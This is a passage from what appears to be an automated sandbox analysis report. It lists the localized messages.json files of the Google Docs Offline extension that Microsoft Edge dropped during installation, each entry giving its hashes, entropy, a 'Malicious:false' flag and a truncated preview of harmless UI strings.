                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):936
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                          MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                          SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                          SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                          SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3830
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                          MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                          SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                          SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                          SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1898
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                          MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                          SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                          SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                          SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):914
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                          MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                          SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                          SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                          SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\nn\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):851
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                          MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                          SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                          SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                          SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):878
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                          MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                          SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                          SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                          SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2766
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                          MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                          SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                          SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                          SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):978
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                          MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                          SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                          SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                          SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):907
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                          MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                          SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                          SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                          SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):914
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                          MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                          SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                          SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                          SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):937
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                          MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                          SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                          SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                          SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1337
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                          MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                          SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                          SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                          SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2846
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                          MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                          SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                          SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                          SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir3524_1414170069\CRX_INSTALL\_locales\sk\messages.json

